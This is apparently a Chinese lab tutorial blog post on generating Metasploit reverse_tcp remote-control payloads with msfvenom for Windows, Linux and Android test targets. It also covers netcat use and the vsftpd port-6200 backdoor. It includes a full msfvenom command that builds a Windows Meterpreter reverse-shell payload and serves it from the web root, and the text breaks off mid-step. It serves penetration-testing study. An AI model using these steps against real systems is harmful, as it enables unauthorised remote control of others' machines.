Kali Linux远程控制

目录

前言:

如何使用msfvenom生成被控端并进行远程控制

在Kali 2中生成被控端的工具:msfvenom(msfvenom是渗透测试工具Metasploit中的一个命令)

一、前导练习:

1、查看帮助信息

2、查看所有可以使用的攻击模块

3、筛选出使用reverse_tcp的模块

二、 为什么6200端口变成了一个“后门”

         三、生成windows系统下的被控端并进行远程控制

        1、生成Windows操作系统下的被控端并放入目标靶机运行

 方法一: 将被控端payload.exe生成到/var/payload.exe

 方法二:将被控端winpayload.exe生成到网站的目录(/var/www/html/)下,然后到靶机中用浏览器下载并运行。

        2、启动主控端

(1)启动metasploit,进入metasploit(msf)的控制台。

         (2)使用handler模块,然后配置参数。

       3、控制目标靶机(WinXPenSP3)

         四. 生成linux系统下的被控端并进行远程控制

      1、生成linux操作系统下的被控端并放入目标靶机运行

1、查看linux的攻击载荷

2、生成被控端

      2、启动主控端

1、启动metasploit,进入metasploit(msf)的控制台。

2、使用handler模块,然后配置参数。

      3、到目标靶机(Metasploitable2-Linux)下载攻击载荷并运行

1、下载被控端

2、查看被控端是否给了执行权限,没给则需要添加执行权限。

3、运行被控端

      4、控制目标靶机(Metasploitable2-Linux)

输入shell,执行各种命令,如查看操作系统信息、磁盘信息、关闭系统等。

         五、生成android系统下的被控端并进行远程控制

      1、生成android操作系统下的被控端并放入目标靶机运行

1、查看android的攻击载荷(只查看使用reverse_tcp)

2、生成被控端

      2、启动主控端

1、启动metasploit,进入metasploit(msf)的控制台。

2、使用handler模块,然后配置参数。

      3、到目标靶机(android-86_64-7.1-r5)下载攻击载荷并运行

1、下载被控端

2、运行被控端

      4、控制目标靶机(android-86_64-7.1-r5)

1、输入:shell

2、查看当前用户名

3、查看操作系统信息

5、尝试切换到root用户


前言:

如果可以选择的话,你觉得黑客最希望对目标系统做些什么呢?

1、让目标系统上的服务崩溃。

2、在目标系统上执行某个程序。

3、直接控制目标系统。

是不是第3个选择是最激动人心的呢?确实,黑客最喜欢做的事情就是在目标系统上运行一个远程控制程序,从而直接控制目标系统。远程控制程序是一个很常见的计算机用语,指的就是可以在一台设备上操控另一台设备的软件。我们平时在windows操作系统上运行的软件大都是EXE文件,而在Android操作系统上运行的软件大都是APK文件。显然你制造的一个用于windows操作系统下的远程操控被控端对于手机的Android操作系统是毫无作用的。目前常见的操作系统主要有windows、Android、iOS,以及各种版本的Linux操作系统。


如何使用msfvenom生成被控端并进行远程控制

在Kali 2中生成被控端的工具:msfvenom(msfvenom是渗透测试工具Metasploit中的一个命令)

一、前导练习:

  1. 1、查看帮助信息

  2. 2、查看所有可以使用的攻击模块

  3. 3、筛选出使用reverse_tcp的模块


二、 为什么6200端口变成了一个“后门”

Netcat工具的使用:(以Metasploitable 2的80端口为例进行测试)

  1. 使用Netcat扫描某IP地址的指定端口

  1. 使用Netcat连接指定IP地址的指定端口

I:激活笑脸漏洞,使其开启6200端口:

编写python脚本(文件名:backdoor.py):

  

执行并验证:

(图)

 I: 显示指定目录下的内容

 II: 尝试其它测试命令

三、生成windows系统下的被控端并进行远程控制

测试windows系统实验使用的网络环境,填写以下IP地址:

测试用windows系统(WinXPenSP)的IP:   192.168.17.128 

虚拟机Kali Linux 2的IP:  192.168.17.129            

  1. 1、生成Windows操作系统下的被控端并放入目标靶机运行

  2. options(选项):

    -p   指定要生成的攻击荷载(payload)

    -f   输出格式(format)

    -o   输出(out)存储payload的位置

 方法一: 将被控端payload.exe生成到/var/payload.exe

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.17.129 lport=20000 -f exe -o /var/www/html/winpayload.exe

 方法二:将被控端winpayload.exe生成到网站的目录(/var/www/html/)下,然后到靶机中用浏览器下载并运行。

(1)将被控端改名为winpayload.exe复制到网站的目录(/var/www/html/)下

(2)检查apache2服务是否启动:systemctl status apache2.service

(3)启动apache2服务:systemctl start apache2.service

(4)到靶机WinXP

  • 4
    点赞
  • 26
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值